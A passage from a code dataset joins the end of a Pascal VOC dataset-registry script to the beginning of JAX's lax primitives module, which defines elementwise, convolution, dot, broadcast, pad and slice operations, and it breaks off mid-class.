#from lib.datasets.DIY_pascal_voc import DIY_pascal_voc
import numpy as np
# Set up voc_<year>_<split>
for year in ['2007', '2012']:
for split in ['train', 'val', 'trainval', 'test']:
name = 'voc_{}_{}'.format(year, split)
__sets[name] = (lambda split=split, year=year: pascal_voc(split, year))
# print('2')
# # Set up coco_2014_<split>
# for year in ['2014']:
# for split in ['train', 'val', 'minival', 'valminusminival', 'trainval']:
# name = 'coco_{}_{}'.format(year, split)
# __sets[name] = (lambda split=split, year=year: coco(split, year))
#
# # Set up coco_2015_<split>
# for year in ['2015']:
# for split in ['test', 'test-dev']:
# name = 'coco_{}_{}'.format(year, split)
# __sets[name] = (lambda split=split, year=year: coco(split, year))
for year in ['2018']:
for split in ['trainval']:
name = 'DIY_dataset'
__sets[name] = (lambda split=split, year=year: DIY_pascal_voc(split, year))
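        # NOTE (added): the DIY_pascal_voc import above is commented out, so calling
        # get_imdb('DIY_dataset') would raise a NameError unless that import is restored.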
# print('3\n')
def get_imdb(name):
"""Get an imdb (image database) by name."""
print('sets', __sets)
if name not in __sets:
raise KeyError('Unknown dataset: {}'.format(name))
return __sets[name]()
def list_imdbs():
"""List all registered imdbs."""
return list(__sets.keys()) |
py | b415cd4fb7a3ec0185680c3390be83a65b1c9697 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Pytype is too slow to check this file.
# pytype: skip-file
import builtins
from enum import IntEnum
import functools
import itertools
import operator
from typing import (Any, Callable, List, NamedTuple, Optional, Sequence,\
Union, Tuple)
import warnings
import numpy as np
import jax
from jax import core
from jax import ad_util
from jax import api
from jax import api_util
from jax import linear_util as lu
from jax import dtypes
from jax import lazy
from jax import tree_util
from jax.config import flags, config
from jax.core import (Primitive, _canonicalize_dimension, UnshapedArray,
ShapedArray, ConcreteArray, raise_to_shaped,
abstract_token, canonicalize_shape)
from jax.abstract_arrays import array_types
from jax.interpreters import partial_eval as pe
from jax.interpreters import xla
from jax.interpreters import pxla
from jax.interpreters import ad
from jax.interpreters import invertible_ad as iad
from jax.interpreters import batching
from jax.interpreters import masking
from jax._src.util import (cache, safe_zip, partial, prod, safe_map,
canonicalize_axis, split_list)
from jax.tree_util import tree_map
from jax.lib import pytree
from jax.lib import xla_bridge
from jax.lib import xla_client
xb = xla_bridge
xc = xla_client
xops = xla_client.ops
FLAGS = flags.FLAGS
_max = builtins.max
_min = builtins.min
_reduce = functools.reduce
Array = Any
DType = Any
Shape = Sequence[int]
def _try_broadcast_shapes(shapes):
assert shapes
if len(shapes) == 1: return shapes[0]
rank, *others = {len(shape) for shape in shapes}
if others: return None # must have consistent rank
if not rank: return () # scalar case
result_shape = [None] * rank
for i, sizes in enumerate(zip(*shapes)):
if sizes[:-1] == sizes[1:]:
result_shape[i] = sizes[0] # all equal sizes for this dimension
else:
sizes = [d for d in sizes if d != 1]
if sizes[:-1] != sizes[1:]:
return None # must have equal sizes other than 1-sized axes
result_shape[i] = sizes[0] if sizes else 1
return tuple(result_shape)
@cache()
def broadcast_shapes(*shapes):
"""Returns the shape that results from NumPy broadcasting of `shapes`."""
if len(shapes) == 1:
return shapes[0]
ndim = _max(len(shape) for shape in shapes)
shapes = [(1,) * (ndim - len(shape)) + shape for shape in shapes]
result_shape = _try_broadcast_shapes(shapes)
if result_shape is None:
raise ValueError("Incompatible shapes for broadcasting: {}"
.format(tuple(map(tuple, shapes))))
return result_shape
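# Hedged usage sketch (added for illustration; not part of the original module).
# Shows NumPy-style shape broadcasting as computed by `broadcast_shapes`.
def _example_broadcast_shapes():
    # (3, 1) broadcast with (1, 4) and (4,) gives (3, 4).
    return broadcast_shapes((3, 1), (1, 4), (4,))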
def _identity(x): return x
### traceables
def neg(x: Array) -> Array:
r"""Elementwise negation: :math:`-x`."""
return neg_p.bind(x)
def sign(x: Array) -> Array:
r"""Elementwise sign.
For floating-point inputs, returns
:math:`\mathrm{sign}(x) = \begin{cases}
-1 & x < 0\\
-0 & x = -0\\
\mathit{NaN} & x = \mathit{NaN}\\
+0 & x = +0\\
1 & x > 0
\end{cases}`
For signed integer inputs, returns
:math:`\mathrm{sign}(x) = \begin{cases}
-1 & x < 0\\
0 & x = 0\\
1 & x > 0
\end{cases}`
For complex inputs, returns the complex phase, i.e.
:math:`\mathrm{sign}(x) = \frac{x}{|x|}`.
"""
return sign_p.bind(x)
def nextafter(x1: Array, x2: Array) -> Array:
r"""Returns the next representable value after `x1` in the direction of `x2`.
Note that in some environments flush-denormal-to-zero semantics is used.
This means that, around zero, this function returns strictly non-zero
values which appear as zero in any operations. Consider this example::
>>> jnp.nextafter(0, 1) # denormal numbers are representable
DeviceArray(1.e-45, dtype=float32)
>>> jnp.nextafter(0, 1) * 1 # but are flushed to zero
DeviceArray(0., dtype=float32)
For the smallest usable (i.e. normal) float, use ``tiny`` of ``jnp.finfo``.
"""
return nextafter_p.bind(_brcast(x1, x2), _brcast(x2, x1))
def floor(x: Array) -> Array:
r"""Elementwise floor: :math:`\left\lfloor x \right\rfloor`."""
return floor_p.bind(x)
def ceil(x: Array) -> Array:
r"""Elementwise ceiling: :math:`\left\lceil x \right\rceil`."""
return ceil_p.bind(x)
class RoundingMethod(IntEnum):
AWAY_FROM_ZERO = 0
TO_NEAREST_EVEN = 1
def round(x: Array,
rounding_method: RoundingMethod = RoundingMethod.AWAY_FROM_ZERO
) -> Array:
r"""Elementwise round.
Rounds values to the nearest integer.
Args:
x: an array or scalar value to round.
rounding_method: the method to use when rounding halfway values
(e.g., `0.5`). See ``lax.RoundingMethod`` for the list of possible
values.
Returns:
An array containing the elementwise rounding of x.
"""
rounding_method = RoundingMethod(rounding_method)
return round_p.bind(x, rounding_method=rounding_method)
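# Hedged usage sketch (added for illustration; not part of the original module).
# Demonstrates the two rounding methods on halfway values, using the module's
# existing `np` import to build the input.
def _example_round():
    x = np.array([0.5, 1.5, 2.5], dtype=np.float32)
    away = round(x, RoundingMethod.AWAY_FROM_ZERO)   # -> [1., 2., 3.]
    even = round(x, RoundingMethod.TO_NEAREST_EVEN)  # -> [0., 2., 2.]
    return away, even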
def is_finite(x: Array) -> Array:
r"""Elementwise :math:`\mathrm{isfinite}`.
For each element x returns `True` if and only if x is not :math:`\pm\infty` or
:math:`\mathit{NaN}`.
"""
return is_finite_p.bind(x)
def exp(x: Array) -> Array:
r"""Elementwise exponential: :math:`e^x`."""
return exp_p.bind(x)
def expm1(x: Array) -> Array:
r"""Elementwise :math:`e^{x} - 1`."""
return expm1_p.bind(x)
def log(x: Array) -> Array:
r"""Elementwise natural logarithm: :math:`\mathrm{log}(x)`."""
return log_p.bind(x)
def log1p(x: Array) -> Array:
r"""Elementwise :math:`\mathrm{log}(1 + x)`."""
return log1p_p.bind(x)
def tanh(x: Array) -> Array:
r"""Elementwise hyperbolic tangent: :math:`\mathrm{tanh}(x)`."""
return tanh_p.bind(x)
def sin(x: Array) -> Array:
r"""Elementwise sine: :math:`\mathrm{sin}(x)`."""
return sin_p.bind(x)
def cos(x: Array) -> Array:
r"""Elementwise cosine: :math:`\mathrm{cos}(x)`."""
return cos_p.bind(x)
def atan2(x: Array, y: Array) -> Array:
r"""Elementwise arc tangent of two variables:
:math:`\mathrm{atan}({x \over y})`."""
return atan2_p.bind(x, y)
def betainc(a: Array, b: Array, x: Array) -> Array:
r"""Elementwise regularized incomplete beta integral."""
return regularized_incomplete_beta_p.bind(a, b, x)
def lgamma(x: Array) -> Array:
r"""Elementwise log gamma: :math:`\mathrm{log}(\Gamma(x))`."""
return lgamma_p.bind(x)
def digamma(x: Array) -> Array:
r"""Elementwise digamma: :math:`\psi(x)`."""
return digamma_p.bind(x)
def igamma(a: Array, x: Array) -> Array:
r"""Elementwise regularized incomplete gamma function."""
return igamma_p.bind(a, x)
def igammac(a: Array, x: Array) -> Array:
r"""Elementwise complementary regularized incomplete gamma function."""
return igammac_p.bind(a, x)
def igamma_grad_a(a: Array, x: Array) -> Array:
r"""Elementwise derivative of the regularized incomplete gamma function."""
return igamma_grad_a_p.bind(a, x)
def random_gamma_grad(a: Array, x: Array) -> Array:
r"""Elementwise derivative of samples from `Gamma(a, 1)`."""
return random_gamma_grad_p.bind(a, x)
def bessel_i0e(x: Array) -> Array:
r"""Exponentially scaled modified Bessel function of order 0:
:math:`\mathrm{i0e}(x) = e^{-|x|} \mathrm{i0}(x)`
"""
return bessel_i0e_p.bind(x)
def bessel_i1e(x: Array) -> Array:
r"""Exponentially scaled modified Bessel function of order 1:
:math:`\mathrm{i1e}(x) = e^{-|x|} \mathrm{i1}(x)`
"""
return bessel_i1e_p.bind(x)
def erf(x: Array) -> Array:
r"""Elementwise error function: :math:`\mathrm{erf}(x)`."""
return erf_p.bind(x)
def erfc(x: Array) -> Array:
r"""Elementwise complementary error function:
:math:`\mathrm{erfc}(x) = 1 - \mathrm{erf}(x)`."""
return erfc_p.bind(x)
def erf_inv(x: Array) -> Array:
r"""Elementwise inverse error function: :math:`\mathrm{erf}^{-1}(x)`."""
return erf_inv_p.bind(x)
def real(x: Array) -> Array:
r"""Elementwise extract real part: :math:`\mathrm{Re}(x)`.
Returns the real part of a complex number.
"""
return real_p.bind(x)
def imag(x: Array) -> Array:
r"""Elementwise extract imaginary part: :math:`\mathrm{Im}(x)`.
Returns the imaginary part of a complex number.
"""
return imag_p.bind(x)
def complex(x: Array, y: Array) -> Array:
r"""Elementwise make complex number: :math:`x + jy`.
Builds a complex number from real and imaginary parts.
"""
return complex_p.bind(_brcast(x, y), _brcast(y, x))
def conj(x: Array) -> Array:
r"""Elementwise complex conjugate function: :math:`\overline{x}`."""
return conj_p.bind(x, input_dtype=_dtype(x))
def abs(x: Array) -> Array:
r"""Elementwise absolute value: :math:`|x|`."""
return abs_p.bind(x)
def pow(x: Array, y: Array) -> Array:
r"""Elementwise power: :math:`x^y`."""
return pow_p.bind(x, y)
def integer_pow(x: Array, y: int) -> Array:
r"""Elementwise power: :math:`x^y`, where :math:`y` is a fixed integer."""
return integer_pow_p.bind(x, y=y)
def sqrt(x: Array) -> Array:
r"""Elementwise square root: :math:`\sqrt{x}`."""
return sqrt_p.bind(x)
def rsqrt(x: Array) -> Array:
r"""Elementwise reciprocal square root: :math:`1 \over \sqrt{x}`."""
return rsqrt_p.bind(x)
def bitwise_not(x: Array) -> Array:
r"""Elementwise NOT: :math:`\neg x`."""
return not_p.bind(x)
def bitwise_and(x: Array, y: Array) -> Array:
r"""Elementwise AND: :math:`x \wedge y`."""
return and_p.bind(x, y)
def bitwise_or(x: Array, y: Array) -> Array:
r"""Elementwise OR: :math:`x \vee y`."""
return or_p.bind(x, y)
def bitwise_xor(x: Array, y: Array) -> Array:
r"""Elementwise exclusive OR: :math:`x \oplus y`."""
return xor_p.bind(x, y)
def population_count(x: Array) -> Array:
r"""Elementwise popcount, count the number of set bits in each element."""
return population_count_p.bind(x)
def add(x: Array, y: Array) -> Array:
r"""Elementwise addition: :math:`x + y`."""
return add_p.bind(x, y)
def sub(x: Array, y: Array) -> Array:
r"""Elementwise subtraction: :math:`x - y`."""
return sub_p.bind(x, y)
def mul(x: Array, y: Array) -> Array:
r"""Elementwise multiplication: :math:`x \times y`."""
return mul_p.bind(x, y)
def div(x: Array, y: Array) -> Array:
r"""Elementwise division: :math:`x \over y`."""
return div_p.bind(x, y)
def rem(x: Array, y: Array) -> Array:
r"""Elementwise remainder: :math:`x \bmod y`."""
return rem_p.bind(x, y)
def max(x: Array, y: Array) -> Array:
r"""Elementwise maximum: :math:`\mathrm{max}(x, y)`
For complex numbers, uses a lexicographic comparison on the
`(real, imaginary)` pairs."""
return max_p.bind(x, y)
def min(x: Array, y: Array) -> Array:
r"""Elementwise minimum: :math:`\mathrm{min}(x, y)`
For complex numbers, uses a lexicographic comparison on the
`(real, imaginary)` pairs."""
return min_p.bind(x, y)
def shift_left(x: Array, y: Array) -> Array:
r"""Elementwise left shift: :math:`x \ll y`."""
return shift_left_p.bind(x, y)
def shift_right_arithmetic(x: Array, y: Array) -> Array:
r"""Elementwise arithmetic right shift: :math:`x \gg y`."""
return shift_right_arithmetic_p.bind(x, y)
def shift_right_logical(x: Array, y: Array) -> Array:
r"""Elementwise logical right shift: :math:`x \gg y`."""
return shift_right_logical_p.bind(x, y)
def eq(x: Array, y: Array) -> Array:
r"""Elementwise equals: :math:`x = y`."""
return eq_p.bind(x, y)
def ne(x: Array, y: Array) -> Array:
r"""Elementwise not-equals: :math:`x \neq y`."""
return ne_p.bind(x, y)
def ge(x: Array, y: Array) -> Array:
r"""Elementwise greater-than-or-equals: :math:`x \geq y`."""
return ge_p.bind(x, y)
def gt(x: Array, y: Array) -> Array:
r"""Elementwise greater-than: :math:`x > y`."""
return gt_p.bind(x, y)
def le(x: Array, y: Array) -> Array:
r"""Elementwise less-than-or-equals: :math:`x \leq y`."""
return le_p.bind(x, y)
def lt(x: Array, y: Array) -> Array:
r"""Elementwise less-than: :math:`x < y`."""
return lt_p.bind(x, y)
def convert_element_type(operand: Array, new_dtype: DType = None,
weak_type: bool = False) -> Array:
"""Elementwise cast.
Wraps XLA's `ConvertElementType
<https://www.tensorflow.org/xla/operation_semantics#convertelementtype>`_
operator, which performs an elementwise conversion from one type to another.
Similar to a C++ `static_cast`.
Args:
operand: an array or scalar value to be cast
new_dtype: the new type. Should be a NumPy type.
weak_type: whether the new dtype should be weak.
Returns:
An array with the same shape as `operand`, cast elementwise to `new_dtype`.
"""
new_dtype = dtypes.canonicalize_dtype(new_dtype or _dtype(operand))
if hasattr(operand, '__jax_array__'):
operand = operand.__jax_array__()
new_weak_type = bool(weak_type)
old_dtype = dtypes.canonicalize_dtype(_dtype(operand))
old_weak_type = dtypes.is_weakly_typed(operand)
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
msg = "Casting complex values to real discards the imaginary part"
warnings.warn(msg, np.ComplexWarning, stacklevel=2)
if not isinstance(operand, (core.Tracer, xla.DeviceArray)):
return _device_put_raw(np.asarray(operand, dtype=new_dtype),
weak_type=new_weak_type)
elif (old_dtype, old_weak_type) == (new_dtype, new_weak_type):
return operand
else:
return convert_element_type_p.bind(operand, new_dtype=new_dtype,
weak_type=new_weak_type)
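# Hedged usage sketch (added for illustration; not part of the original module).
# An integer array is cast elementwise to float32, analogous to a C++ static_cast.
def _example_convert_element_type():
    x = np.arange(3)                             # integer input [0, 1, 2]
    return convert_element_type(x, np.float32)   # -> float32 array [0., 1., 2.]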
def bitcast_convert_type(operand: Array, new_dtype: DType) -> Array:
"""Elementwise bitcast.
Wraps XLA's `BitcastConvertType
<https://www.tensorflow.org/xla/operation_semantics#bitcastconverttype>`_
operator, which performs a bit cast from one type to another. The bitwidth
of the source and destination types must match.
Args:
operand: an array or scalar value to be cast
new_dtype: the new type. Should be a NumPy type.
Returns:
An array with the same shape as `operand`, bitcast elementwise to
`new_dtype`.
"""
new_dtype = dtypes.canonicalize_dtype(new_dtype)
return bitcast_convert_type_p.bind(operand, new_dtype=new_dtype)
def clamp(min: Array, x: Array, max: Array) -> Array:
r"""Elementwise clamp.
Returns :math:`\mathrm{clamp}(x) = \begin{cases}
\mathit{min} & \text{if } x < \mathit{min},\\
\mathit{max} & \text{if } x > \mathit{max},\\
x & \text{otherwise}
\end{cases}`.
"""
return clamp_p.bind(min, x, max)
def concatenate(operands: Sequence[Array], dimension: int) -> Array:
"""Concatenates a sequence of arrays along `dimension`.
Wraps XLA's `Concatenate
<https://www.tensorflow.org/xla/operation_semantics#concatenate>`_
operator.
Args:
operands: a sequence of arrays to concatenate. The arrays must have equal
shapes, except in the `dimension` axis.
dimension: the dimension along which to concatenate the arrays.
Returns:
An array containing the concatenation.
"""
return concatenate_p.bind(*operands, dimension=dimension)
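# Hedged usage sketch (added for illustration; not part of the original module).
# The operands agree on every axis except the concatenation axis.
def _example_concatenate():
    a = np.ones((2, 2), np.float32)
    b = np.zeros((2, 3), np.float32)
    return concatenate([a, b], dimension=1)      # result has shape (2, 5)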
Precision = xla_client.PrecisionConfig.Precision
Precision.__str__ = lambda precision: precision.name
PrecisionType = Any
PrecisionLike = Union[None, PrecisionType, Tuple[PrecisionType, PrecisionType]]
class ConvDimensionNumbers(NamedTuple):
"""Describes batch, spatial, and feature dimensions of a convolution.
Args:
lhs_spec: a tuple of nonnegative integer dimension numbers containing
`(batch dimension, feature dimension, spatial dimensions...)`.
rhs_spec: a tuple of nonnegative integer dimension numbers containing
`(out feature dimension, in feature dimension, spatial dimensions...)`.
out_spec: a tuple of nonnegative integer dimension numbers containing
`(batch dimension, feature dimension, spatial dimensions...)`.
"""
lhs_spec: Sequence[int]
rhs_spec: Sequence[int]
out_spec: Sequence[int]
ConvGeneralDilatedDimensionNumbers = Union[
None, ConvDimensionNumbers, Tuple[str, str, str]]
def conv_general_dilated(
lhs: Array, rhs: Array, window_strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
lhs_dilation: Optional[Sequence[int]] = None,
rhs_dilation: Optional[Sequence[int]] = None,
dimension_numbers: ConvGeneralDilatedDimensionNumbers = None,
feature_group_count: int = 1, batch_group_count: int = 1,
precision: PrecisionLike = None) -> Array:
"""General n-dimensional convolution operator, with optional dilation.
Wraps XLA's `Conv
<https://www.tensorflow.org/xla/operation_semantics#conv_convolution>`_
operator.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
window_strides: a sequence of `n` integers, representing the inter-window
strides.
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence of
`n` `(low, high)` integer pairs that give the padding to apply before and
after each spatial dimension.
lhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `lhs`. LHS dilation
is also known as transposed convolution.
rhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `rhs`. RHS dilation
is also known as atrous convolution.
dimension_numbers: either `None`, a `ConvDimensionNumbers` object, or
a 3-tuple `(lhs_spec, rhs_spec, out_spec)`, where each element is a string
of length `n+2`.
feature_group_count: integer, default 1. See XLA HLO docs.
batch_group_count: integer, default 1. See XLA HLO docs.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
Returns:
An array containing the convolution result.
In the string case of `dimension_numbers`, each character identifies by
position:
- the batch dimensions in `lhs`, `rhs`, and the output with the character
'N',
- the feature dimensions in `lhs` and the output with the character 'C',
- the input and output feature dimensions in rhs with the characters 'I'
and 'O' respectively, and
- spatial dimension correspondences between lhs, rhs, and the output using
any distinct characters.
For example, to indicate dimension numbers consistent with the `conv` function
with two spatial dimensions, one could use `('NCHW', 'OIHW', 'NCHW')`. As
another example, to indicate dimension numbers consistent with the TensorFlow
Conv2D operation, one could use `('NHWC', 'HWIO', 'NHWC')`. When using the
latter form of convolution dimension specification, window strides are
associated with spatial dimension character labels according to the order in
which the labels appear in the `rhs_spec` string, so that `window_strides[0]`
is matched with the dimension corresponding to the first character
appearing in rhs_spec that is not `'I'` or `'O'`.
If `dimension_numbers` is `None`, the default is `('NCHW', 'OIHW', 'NCHW')`
(for a 2D convolution).
"""
dnums = conv_dimension_numbers(lhs.shape, rhs.shape, dimension_numbers)
if lhs_dilation is None:
lhs_dilation = (1,) * (lhs.ndim - 2)
elif isinstance(padding, str) and not len(lhs_dilation) == lhs_dilation.count(1):
raise ValueError(
"String padding is not implemented for transposed convolution "
"using this op. Please either exactly specify the required padding or "
"use conv_transpose.")
if rhs_dilation is None:
rhs_dilation = (1,) * (rhs.ndim - 2)
if isinstance(padding, str):
lhs_perm, rhs_perm, _ = dnums
rhs_shape = np.take(rhs.shape, rhs_perm)[2:] # type: ignore[index]
effective_rhs_shape = [(k-1) * r + 1 for k, r in zip(rhs_shape, rhs_dilation)]
padding = padtype_to_pads(
np.take(lhs.shape, lhs_perm)[2:], effective_rhs_shape, # type: ignore[index]
window_strides, padding)
return conv_general_dilated_p.bind(
lhs, rhs, window_strides=tuple(window_strides), padding=tuple(padding),
lhs_dilation=tuple(lhs_dilation), rhs_dilation=tuple(rhs_dilation),
dimension_numbers=dnums,
feature_group_count=feature_group_count,
batch_group_count=batch_group_count,
lhs_shape=lhs.shape, rhs_shape=rhs.shape,
precision=_canonicalize_precision(precision))
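# Hedged usage sketch (added for illustration; not part of the original module).
# A single-channel 2D convolution using the string form of `dimension_numbers`;
# all shapes below are illustrative.
def _example_conv_general_dilated():
    lhs = np.ones((1, 1, 5, 5), np.float32)      # NCHW input
    rhs = np.ones((1, 1, 3, 3), np.float32)      # OIHW kernel
    out = conv_general_dilated(lhs, rhs,
                               window_strides=(1, 1),
                               padding='SAME',
                               dimension_numbers=('NCHW', 'OIHW', 'NCHW'))
    return out.shape                             # -> (1, 1, 5, 5)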
def dot(lhs: Array, rhs: Array, precision: PrecisionLike = None,
preferred_element_type: Optional[DType] = None) -> Array:
"""Vector/vector, matrix/vector, and matrix/matrix multiplication.
Wraps XLA's `Dot
<https://www.tensorflow.org/xla/operation_semantics#dot>`_
operator.
For more general contraction, see the `dot_general` operator.
Args:
lhs: an array of rank 1 or 2.
rhs: an array of rank 1 or 2.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
preferred_element_type: Optional. Either ``None``, which means the default
accumulation type for the input types, or a datatype, indicating to
accumulate results to and return a result with that datatype.
Returns:
An array containing the product.
"""
if 1 <= lhs.ndim <= 2 and 1 <= rhs.ndim <= 2 and lhs.shape[-1] == rhs.shape[0]:
return dot_general(lhs, rhs, (((lhs.ndim - 1,), (0,)), ((), ())),
precision=precision, preferred_element_type=preferred_element_type)
else:
raise TypeError("Incompatible shapes for dot: got {} and {}.".format(
lhs.shape, rhs.shape))
DotDimensionNumbers = Tuple[Tuple[Sequence[int], Sequence[int]],
Tuple[Sequence[int], Sequence[int]]]
def dot_general(lhs: Array, rhs: Array, dimension_numbers: DotDimensionNumbers,
precision: PrecisionLike = None,
preferred_element_type: Optional[DType] = None) -> Array:
"""More general contraction operator.
Wraps XLA's `DotGeneral
<https://www.tensorflow.org/xla/operation_semantics#dotgeneral>`_
operator.
Args:
lhs: an array
rhs: an array
dimension_numbers: a tuple of tuples of the form
`((lhs_contracting_dims, rhs_contracting_dims),
(lhs_batch_dims, rhs_batch_dims))`
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs``` and ``rhs``.
preferred_element_type: Optional. Either ``None``, which means the default
accumulation type for the input types, or a datatype, indicating to
accumulate results to and return a result with that datatype.
Returns:
An array containing the result.
"""
contract_dims_seq, batch_dims_seq = dimension_numbers
contract_dims = tuple(map(lambda x: tuple(x), contract_dims_seq))
batch_dims = tuple(map(lambda x: tuple(x), batch_dims_seq))
return dot_general_p.bind(lhs, rhs,
dimension_numbers=(contract_dims, batch_dims),
precision=_canonicalize_precision(precision),
preferred_element_type=preferred_element_type)
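# Hedged usage sketch (added for illustration; not part of the original module).
# A batched matrix multiply written with explicit contracting and batch dimensions.
def _example_dot_general():
    lhs = np.ones((2, 3, 4), np.float32)         # (batch, m, k)
    rhs = np.ones((2, 4, 5), np.float32)         # (batch, k, n)
    dims = (((2,), (1,)), ((0,), (0,)))          # contract over k, batch over axis 0
    return dot_general(lhs, rhs, dims).shape     # -> (2, 3, 5)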
def broadcast(operand: Array, sizes: Sequence[int]) -> Array:
"""Broadcasts an array, adding new major dimensions.
Wraps XLA's `Broadcast
<https://www.tensorflow.org/xla/operation_semantics#broadcast>`_
operator.
Args:
operand: an array
sizes: a sequence of integers, giving the sizes of new major dimensions
to add.
Returns:
An array containing the result.
"""
dims = tuple(range(len(sizes), len(sizes) + np.ndim(operand)))
return broadcast_in_dim(operand, tuple(sizes) + np.shape(operand), dims)
def broadcast_in_dim(operand: Array, shape: Shape,
broadcast_dimensions: Sequence[int]) -> Array:
"""Wraps XLA's `BroadcastInDim
<https://www.tensorflow.org/xla/operation_semantics#broadcastindim>`_
operator.
"""
shape = _broadcast_in_dim_shape_rule(
operand, shape=shape, broadcast_dimensions=broadcast_dimensions)
if (np.ndim(operand) == len(shape) and not len(broadcast_dimensions)
and isinstance(operand, (xla.DeviceArray, core.Tracer))):
return operand
return broadcast_in_dim_p.bind(
operand, shape=tuple(shape),
broadcast_dimensions=tuple(broadcast_dimensions))
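# Hedged usage sketch (added for illustration; not part of the original module).
# A length-3 vector is mapped onto axis 1 of a (2, 3) result, so each row is a
# copy of the vector.
def _example_broadcast_in_dim():
    x = np.arange(3)
    return broadcast_in_dim(x, (2, 3), broadcast_dimensions=(1,))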
def broadcast_to_rank(x: Array, rank: int) -> Array:
"""Adds leading dimensions of ``1`` to give ``x`` rank ``rank``."""
return broadcast(x, (1,) * (rank - x.ndim))
def reshape(operand: Array, new_sizes: Shape,
dimensions: Optional[Sequence[int]] = None) -> Array:
"""Wraps XLA's `Reshape
<https://www.tensorflow.org/xla/operation_semantics#reshape>`_
operator.
For inserting/removing dimensions of size 1, prefer using ``lax.squeeze`` /
``lax.expand_dims``. These preserve information about axis identity that may
be useful for advanced transformation rules.
"""
new_sizes = canonicalize_shape(new_sizes) # TODO
new_sizes = tuple(new_sizes)
same_shape = np.shape(operand) == new_sizes
same_dims = dimensions is None or tuple(dimensions) == tuple(range(np.ndim(operand)))
if np.shape(operand) and same_shape and same_dims:
return operand
else:
return reshape_p.bind(
operand, new_sizes=new_sizes,
dimensions=None if dimensions is None or same_dims else tuple(dimensions))
def pad(operand: Array, padding_value: Array,
padding_config: Sequence[Tuple[int, int, int]]) -> Array:
"""Applies low, high, and/or interior padding to an array.
Wraps XLA's `Pad
<https://www.tensorflow.org/xla/operation_semantics#pad>`_
operator.
Args:
operand: an array to be padded.
padding_value: the value to be inserted as padding. Must have the same dtype
as ``operand``.
padding_config: a sequence of ``(low, high, interior)`` tuples of integers,
giving the amount of low, high, and interior (dilation) padding to insert
in each dimension.
Returns:
The ``operand`` array with padding value ``padding_value`` inserted in each
dimension according to the ``padding_config``.
"""
return pad_p.bind(operand, padding_value, padding_config=tuple(padding_config))
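# Hedged usage sketch (added for illustration; not part of the original module).
# One (low, high, interior) triple is given per dimension; interior padding
# inserts values between existing elements.
def _example_pad():
    x = np.array([1., 2., 3.], dtype=np.float32)
    zero = np.float32(0)                          # must match the operand dtype
    edge = pad(x, zero, [(2, 1, 0)])              # -> [0., 0., 1., 2., 3., 0.]
    dilated = pad(x, zero, [(0, 0, 1)])           # -> [1., 0., 2., 0., 3.]
    return edge, dilated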
def rev(operand: Array, dimensions: Sequence[int]) -> Array:
"""Wraps XLA's `Rev
<https://www.tensorflow.org/xla/operation_semantics#rev_reverse>`_
operator.
"""
return rev_p.bind(operand, dimensions=tuple(dimensions))
def select(pred: Array, on_true: Array, on_false: Array) -> Array:
"""Wraps XLA's `Select
<https://www.tensorflow.org/xla/operation_semantics#select>`_
operator.
"""
return select_p.bind(pred, on_true, on_false)
def slice(operand: Array, start_indices: Sequence[int],
limit_indices: Sequence[int],
strides: Optional[Sequence[int]] = None) -> Array:
"""Wraps XLA's `Slice
<https://www.tensorflow.org/xla/operation_semantics#slice>`_
operator.
"""
return slice_p.bind(operand, start_indices=tuple(start_indices),
limit_indices=tuple(limit_indices),
strides=None if strides is None else tuple(strides))
def dynamic_slice(operand: Array, start_indices: Sequence[Array],
slice_sizes: Shape) -> Array:
"""Wraps XLA's `DynamicSlice
<https://www.tensorflow.org/xla/operation_semantics#dynamicslice>`_
operator.
Args:
operand: an array to slice.
start_indices: a list of scalar indices, one per dimension. These values
may be dynamic.
slice_sizes: the size of the slice. Must be a sequence of non-negative
integers with length equal to `ndim(operand)`. Inside a JIT compiled
function, only static values are supported (all JAX arrays inside JIT
must have statically known size).
Returns:
An array containing the slice.
"""
start_indices = _dynamic_slice_indices(operand, start_indices)
return dynamic_slice_p.bind(operand, *start_indices,
slice_sizes=tuple(slice_sizes))
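# [Editor's note] Illustrative sketch only (not part of the original module),
# assuming `jax.numpy` is available; the helper name is hypothetical.
def _example_dynamic_slice_sketch():
  import jax.numpy as jnp
  x = jnp.arange(5)
  # Start indices may be traced values; slice sizes must be static.
  assert dynamic_slice(x, (1,), (2,)).tolist() == [1, 2]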
def dynamic_update_slice(operand: Array, update: Array,
start_indices: Array) -> Array:
"""Wraps XLA's `DynamicUpdateSlice
<https://www.tensorflow.org/xla/operation_semantics#dynamicupdateslice>`_
operator.
Args:
operand: an array to update.
update: an array containing the new values to write onto `operand`.
start_indices: a list of scalar indices, one per dimension.
Returns:
An array containing the new values of `operand`, with `update` written at the
location given by `start_indices`.
"""
start_indices = _dynamic_slice_indices(operand, start_indices)
return dynamic_update_slice_p.bind(operand, update, *start_indices)
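# [Editor's note] Illustrative sketch only (not part of the original module),
# assuming `jax.numpy` is available; the helper name is hypothetical.
def _example_dynamic_update_slice_sketch():
  import jax.numpy as jnp
  x = jnp.zeros(5)
  y = dynamic_update_slice(x, jnp.ones(2), (1,))
  assert y.tolist() == [0., 1., 1., 0., 0.]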
class GatherDimensionNumbers(NamedTuple):
"""
